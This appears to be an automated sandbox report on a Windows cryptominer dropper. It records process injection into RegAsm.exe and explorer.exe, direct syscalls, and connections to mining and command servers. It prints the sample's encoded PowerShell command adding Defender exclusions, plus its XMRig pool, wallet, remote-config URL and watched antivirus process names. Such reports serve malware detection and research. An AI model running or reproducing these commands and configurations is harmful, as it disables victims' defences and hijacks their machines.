                  Source: RegAsm.exeBinary or memory string: YOeGR8Q2ZuYSB1CubmVm/jNzB2QeMuLW/5KzBxdn7O919yYiB3XmxZcnl6b3llb2IxenZ4eG5nZVpjenvmdhHu/EBk0DMkblm3PTBuoSAla3dw4npwaidZ/P5PcX5aYXpoWmBEdQhuaHR7emhCZl/j5Uh2hTYgZw+fKzBxdvJhd3J7ZHRDdG5pc216YoBur2MDfRZvImpn5/hdemUxOmFOdzcubDIrJHF8c+59cmQPWXurdmkTaVkJ/1p6EzQmYGYq5A
                  Source: RegAsm.exeBinary or memory string: bnFyeXom+20n4j9efjonPDAuOi4vMCIxNi7rnoxsd27lMBLyIwr7FQfgIhb/7Vb6Z29u5uZV4HBhZuPGQPR3bm745l3mbnBkJ+AySjrioyJULn4j8TBUPFJnJvktRDtdJ3kUMXUAkCzkOksyRThqJuz2jm96cTz7KD4jQS4kPuUsIRQxdQCyLVwpM3VfHVZ6aEYSS1o1e1klQlo2a0U7Si41fVAuSiAgYEIvXhYtfUMDSx4rdVjYVOFmanICJHgAhjj5
                  Source: RegAsm.exeBinary or memory string: G5gZG8ZZjL1q1Ui7CaWJ1GwPPOhniLxnHMAdIY59mV65LMs5DdXEj7iBk4XJ+2rOjAqLzylgliccHeiojn7JV5mOO0bT2MtPuqeSi/kN2cz+oQ4Sn8i+Z0ktpVsOfeiD2pCpIRNO/mNaAR7L+Skh/PKi4/qplmgLJuEhWxCoDHxYcBlJwih8WL4+3wv5DJLSjn/BEVeIvGgTCitojn5vTLnKGwn4gNqPuAKcivmDk8vMCIxNi7hnizvmy4j+pMw8Z407
                  Source: RegAsm.exeBinary or memory string: bnSqFCxjCa/lsDq4knYx7+vo8wdNac+amGxuJ/EtUEApVas67xhTVgg5fQebJ/kgUGM/8acl+RZDLyJMrxc9fx+9DH0LmBFhAYo98nZcP+8rWXsz/ag6nYYnbZ8ycq476HpYOu+qPl2rOEGgMec0VmciQIo74rki7jNKXzZSuTjoEk5KKedzVyf6PkByJ/ukJpyQNnWTOuEzSyYneaE5+V1fIvmmIUSWJkI2XRomQ7Un6B9eJmg74yNWZiPzDVAwKe8+
                  Source: RegAsm.exeBinary or memory string: xuH1ibjn5tvGej3FmYX96858HXoxmJuS1jmGKaGpqOu8oUy4mSPZdum5wZBpxO/EyTQIiXutKn3pxdAVqLq3x7Gx3bm5xcnky5cRAP2pzej7izk4/bm5vMvCwMGBmaimnoLuior2+tbYm+ThLezvzGk1qPDAuOi4vMCI44ooqP++MP+WcOfmQMqm3m5CUjDKJrhTpWxVuGozKcHBhZiL/cQBUdG41+boy5b6Myi15ejNan++nKuWaO37gtuSmHj7nk3Q
                  Source: RegAsm.exeBinary or memory string: 6ZOzLjdTKeloyRTyH5KU8k41vMPflEkeWVcxF8n0SAgY0x8aY473+UIWr9kToJoCbla7w58bAUaiL5J0Q/5WqBmXtJrjjvM09DMv0FVlIv5BpLOjn/DEUuIvGgTDYwrTn7JV5mOO0DT2My/x1WcjAuOi4vMCIxNi7pnkRfpdducXB5khrskpAj+KI+4HeoelZuJ/f5dGBhZiL7adBqV245//F6TnBkJ+J+zGtQciLq525fenE8+WzWd0tkJPrmbjFyeT
                  Source: RegAsm.exeBinary or memory string: jn/BEUuKy0lMjYzLy0tkI+Uj5ujI/omUnEnPDAuOi4vMCIxNi7n3kDsgpGROfOV+mVwZCfgdtQRcHIiVKsm5v8BfnBh7Ch6KOFSzHa9jT3xf4a8I+C6Mv89VgrsPmp0uvKUbSnvJlY877d3K0KpPP+8+SBLOz73N2E24/pfbW96NHs4siPhgSBXpS/jKlQ48aw175RkMLgz4pkuTL/lpzZytTToMk5GLeE2ZiL4Nl0KJnOmIuYicj7gNk4PLkWv8zVQM
                  Source: RegAsm.exeBinary or memory string: ifosho+4qciZKCGoahtdHHWhmpyZIVtkZGO8bGFJvs4S1s78RpNSiLsG0ovMvoIVCku6bZELSitojn7JV5mOO0bT2sy/xVWSjIuOi4vMCIxNi7hnizvm15hx3A18Z/7ae51S3o/4oMv7I8m5IBKtQMNImXEDm0212lxcnk+YcYmbS5Qk0W7P0mmCec5Yjj/NkEs536MJP5gJ/o0WTDjfKQn4j1y/C5xqo9tSmx1x7QW6CBw/yZpM1WGBGcx9zl0IeIqj
                  Source: RegAsm.exeBinary or memory string: Mnp2aitwLK6KdjNVroFlGGtvCT74AX5udmw67wBTJp1+DT17fhYg5h19hXUh+TZDLybkDlUkOOKiSjM7LSkxrTn7JV5mOO0bT2My/xVWcjIuOi4vMCIxNi7hnizvmy4j+oMw8bY875Uj+Is+4gt6L+Rjsfo7dH82pmVjIYw202t1cnkcKvkJgSP4P54gzmpnb25veo6LOUKiInmlJP4rhpkdpkpu+SGPJ/i1O+K1Iuo6jifxv5zOnJmV4izneuTuO3Ix
                  Source: RegAsm.exeBinary or memory string: SvlvfGztbBoJ6u4ayhEvipCoPIuSmClrWT4uEUtVnImXKsr8bm1uGgnq7NrKESm5TVWObuudyBcozLxsC1BoESpKlw2VWwx6rAvQamttWIqQn5dPuc8QEMu/vC4Kk+vI2ykLruwczRqpiv5pV+1KuUVVkU+5RxAWypwvTLiDk5XLm2vO/qnsadvWaEhX4sqbYmzsncvU7Yq4LQ7Rbo3YaEubb4+UrIxYrJppe+W/KyvsXu4tWFDnFyR+C5SbbOoaOSsX
                  Source: RegAsm.exeBinary or memory string: 54Udubm+S/Wh0YS7h+Uxtd26G8W59eib7739qc3qeHW5uZyft1HJ0dHBhEn4676efHM9xcjHx5Xhhb2ub/O1pciLs5H5qenGcCvpmajrv529rbnE69G+6A0FvKsvicmlyggbRa28y+r+YWH9qcizn/OZqcXKR165wZCfg+BJhaXIi6nrJHF9xNcj8YmpyjFjJa245+fJCaHBkJ+Zm9AVMcivfz2pveplvzmRmIvnvBHBubpktloWROO/k43V6diH/fw4
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\explorer.exeNetwork Connect: 5.188.137.200 3333Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 154.216.20.243 443Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 185.157.162.216 4444Jump to behavior
                  Encrypted powershell cmdline option found
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\frontdesk\Desktop\ZppxPm0ASs.exe; Add-MpPreference -ExclusionProcess C:\Users\frontdesk\Desktop\ZppxPm0ASs.exe;Add-MpPreference -ExclusionPath C:\Users\frontdesk\AppData\Roaming\IsStopped.exe; Add-MpPreference -ExclusionProcess C:\Users\frontdesk\AppData\Roaming\IsStopped.exe
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\frontdesk\Desktop\ZppxPm0ASs.exe; Add-MpPreference -ExclusionProcess C:\Users\frontdesk\Desktop\ZppxPm0ASs.exe;Add-MpPreference -ExclusionPath C:\Users\frontdesk\AppData\Roaming\IsStopped.exe; Add-MpPreference -ExclusionProcess C:\Users\frontdesk\AppData\Roaming\IsStopped.exeJump to behavior
                  Found direct / indirect Syscall (likely to bypass EDR)
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtProtectVirtualMemory: Direct from: 0x7FFAAC64A5A9
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeNtAllocateVirtualMemory: Direct from: 0x7FFB2CEA4B5EJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeNtSetContextThread: Direct from: 0x7FFAAC65E916Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtQuerySystemInformation: Direct from: 0x7FFB09571285
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeNtCreateFile: Direct from: 0x7FFB0A4B517FJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtOpenKeyEx: Direct from: 0x7FFB0BA287B7
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtReadFile: Direct from: 0x7FFB0BA45F36
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtSetInformationProcess: Direct from: 0x7FFB0B9AFF6B
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeNtAllocateVirtualMemory: Direct from: 0x7FFAAC65CE79Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtUnmapViewOfSection: Direct from: 0x7FFAAC64ADE6
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtQueryValueKey: Direct from: 0x7FFB08AE1DC5
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtOpenFile: Direct from: 0x7FFB0BA332D3
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeNtResumeThread: Direct from: 0x7FFB0B9E8CF6Jump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeNtQuerySystemInformation: Direct from: 0x7FFB0B9E8FF3Jump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeNtWriteVirtualMemory: Direct from: 0x7FFAAC65E362Jump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeNtAdjustPrivilegesToken: Direct from: 0x7FFB09571BECJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtCreateFile: Direct from: 0x7FFB0BA45FD7
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeNtRequestWaitReplyPort: Direct from: 0x7FFB0BA02EA4Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtQueryAttributesFile: Direct from: 0x7FFB0BA2BC4A
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeNtProtectVirtualMemory: Direct from: 0x7FFB0957B1ACJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeNtDelayExecution: Direct from: 0x7FFB0B955073Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtSetInformationProcess: Direct from: 0x7FFB0B9AFF46
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeNtAllocateVirtualMemory: Direct from: 0x7FFAAC64EADDJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtWriteVirtualMemory: Direct from: 0x7FFAAC64B692
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeNtQueryVolumeInformationFile: Direct from: 0x7FFB0A4B734CJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeNtCreateThreadEx: Direct from: 0x7FFB0B9E8EE0Jump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeNtSetInformationThread: Direct from: 0x7FFB0BABC20CJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeNtResumeThread: Direct from: 0x7FFAAC65F21CJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtMapViewOfSection: Direct from: 0x7FFB0BA4A7F5
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtResumeThread: Direct from: 0x7FFAAC64C95C
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeNtSetSecurityObject: Direct from: 0x7FFB2CE826A1Jump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeNtUnmapViewOfSection: Direct from: 0x7FFAAC65DAB6Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtSetContextThread: Direct from: 0x7FFAAC64BC46
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeNtQueryAttributesFile: Direct from: 0x7FFB0A4B4413Jump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeNtReadFile: Direct from: 0x7FFB0A4AC9C8Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtQuerySystemInformation: Direct from: 0x7FFB0B9753EE
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeNtProtectVirtualMemory: Direct from: 0x7FFB0B9AFF57
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 140000000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 140000000 value starts with: 4D5A
                  Injects code into the Windows Explorer (explorer.exe)
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 2868 base: 140000000 value: 4DJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 2868 base: 140001000 value: 40Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 2868 base: 140360000 value: 00Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 2868 base: 1404C8000 value: 20Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 2868 base: 1407FB000 value: 00Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 2868 base: 14081B000 value: 48Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 2868 base: 14081C000 value: 48Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 2868 base: 14081F000 value: 48Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 2868 base: 140821000 value: CEJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 2868 base: 140822000 value: 00Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 2868 base: 140823000 value: 00Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMemory written: PID: 2868 base: 11EC010 value: 00Jump to behavior
                  Modifies the context of a thread in another process (thread injection)
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeThread register set: target process: 8188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread register set: target process: 2868Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeThread register set: target process: 7872
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 140000000Jump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 140001000Jump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 140006000Jump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 140008000Jump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 1406C0000Jump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 1406C1000Jump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 1406C2000Jump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 1406C3000Jump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 2945F7B010Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 140000000
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 140001000
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 140006000
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 140008000
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 1406C0000
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 1406C1000
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 1406C2000
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 1406C3000
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe base: 5DD20F4010
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwARABlAHMAawB0AG8AcABcAFoAcABwAHgAUABtADAAQQBTAHMALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABmAHIAbwBuAHQAZABlAHMAawBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAdABvAHAAcABlAGQALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGYAcgBvAG4AdABkAGUAcwBrAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABJAHMAUwB0AG8AcABwAGUAZAAuAGUAeABlAA==Jump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\IsStopped.exe "C:\Users\user\AppData\Roaming\IsStopped.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagyacgbvag4adabkaguacwbrafwarablahmaawb0ag8acabcafoacabwahgauabtadaaqqbtahmalgblahgazqa7acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabyag8aywblahmacwagaemaogbcafuacwblahiacwbcagyacgbvag4adabkaguacwbrafwarablahmaawb0ag8acabcafoacabwahgauabtadaaqqbtahmalgblahgazqa7aeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabdadoaxabvahmazqbyahmaxabmahiabwbuahqazablahmaawbcaeeacabwaeqayqb0ageaxabsag8ayqbtagkabgbnafwasqbzafmadabvahaacablagqalgblahgazqa7acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabyag8aywblahmacwagaemaogbcafuacwblahiacwbcagyacgbvag4adabkaguacwbrafwaqqbwahaarabhahqayqbcafiabwbhag0aaqbuagcaxabjahmauwb0ag8acabwaguazaauaguaeablaa==
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagyacgbvag4adabkaguacwbrafwarablahmaawb0ag8acabcafoacabwahgauabtadaaqqbtahmalgblahgazqa7acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabyag8aywblahmacwagaemaogbcafuacwblahiacwbcagyacgbvag4adabkaguacwbrafwarablahmaawb0ag8acabcafoacabwahgauabtadaaqqbtahmalgblahgazqa7aeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabdadoaxabvahmazqbyahmaxabmahiabwbuahqazablahmaawbcaeeacabwaeqayqb0ageaxabsag8ayqbtagkabgbnafwasqbzafmadabvahaacablagqalgblahgazqa7acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabyag8aywblahmacwagaemaogbcafuacwblahiacwbcagyacgbvag4adabkaguacwbrafwaqqbwahaarabhahqayqbcafiabwbhag0aaqbuagcaxabjahmauwb0ag8acabwaguazaauaguaeablaa==Jump to behavior
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"tjalvjhtgxjbffgq","computername":"932923","username":"932923","gpu":"T25DDH","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":4,"type":"xmrig","status":1}'
                  Source: explorer.exe, 00000015.00000003.2056823251.0000000003910000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2909218782.0000000003900000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzhttps://woo097878781.win/P.txtC:\Windows\explorer.exe - Program Manager185.157.162.21646YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB
                  Source: explorer.exe, 00000015.00000003.2057546756.000000000138B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488372794.0000000001385000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488547694.000000000138B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"tjalvjhtgxjbffgq","computername":"932923","username":"932923","gpu":"T25DDH","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":4,"type":"xmrig","status":1}_
                  Source: explorer.exe, 00000015.00000003.2056823251.0000000003910000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2056823251.0000000003900000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2909218782.0000000003900000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\explorer.exe - Program Manager
                  Source: explorer.exe, 00000015.00000003.2056823251.0000000003900000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 40 GHzhttps://woo097878781.win/P.txtC:\Windows\explorer.exe - Program Manager185.157.162.21646YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB
                  Source: explorer.exe, 00000015.00000002.2907055074.00000000013B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \REGISTRY\USER\S-1-5-21-2246122658-3693405117-2476756634-1003_Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32er.exe - Program Manager","runtime":120,"type":"xmrig","pool":"185.157.162.216","port":4444,"algo":"rx/0","worker":"","password":"","user":"46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB","hashrate":556.4722934552348,"status":2}
                  Source: explorer.exe, 00000015.00000003.2057580739.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.00000000013B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"tjalvjhtgxjbffgq","computername":"932923","username":"932923","gpu":"T25DDH","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":60,"type":"xmrig","pool":"185.157.162.216","port":4444,"algo":"rx/0","worker":"","password":"","user":&
                  Source: explorer.exe, 00000015.00000002.2907055074.00000000013B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \REGISTRY\USER\S-1-5-21-2246122658-3693405117-2476756634-1003_Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32er.exe - Program Manager","runtime":120,"type":"xmrig","pool":"185.157.162.216","port":4444,"algo":"rx/0","worker":"","password":"","user":"46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB","hashrate":556.4722934552348,"status":2}
                  Source: explorer.exe, 00000015.00000002.2909218782.0000000003830000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e,fsma32.exe,avkcl.exe,k7tsmngr.exe,avp.exe,mbamservice.exe,mcshield.exe,nortonsecurity.exe,pavsrvx86.exe,savservice.exe,coreframeworkhost.exe,sbamsvc.exe,vsmonIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzvhttps://woo097878781.win/P.txteC:\Windows\explorer.exe - Program Managerexe,360safe.exe,qqpctray.exe,totalavservice.exe,baidusdtray.exe,npssvc.exe,cyserv.exe,vipretray.exestealth-fullscreenalgo
                  Source: explorer.exe, 00000015.00000002.2907055074.00000000013B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: er.exe - Program Manager","runtime":120,"type":"xmrig","pool":"185.157.162.216","port":4444,"algo":"rx/0","worker":"","password":"","user":"46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB","hashrate":556.4722934552348,"status":2}
                  Source: explorer.exe, 00000015.00000002.2909218782.0000000003830000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eC:\Windows\explorer.exe - Program Manager
                  Source: explorer.exe, 00000015.00000002.2907055074.00000000013B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: er.exe - Program Manager","runtime":60,"type":"xmrig","pool":"185.157.162.216","port":4444,"algo":"rx/0","worker":"","password":"","user":
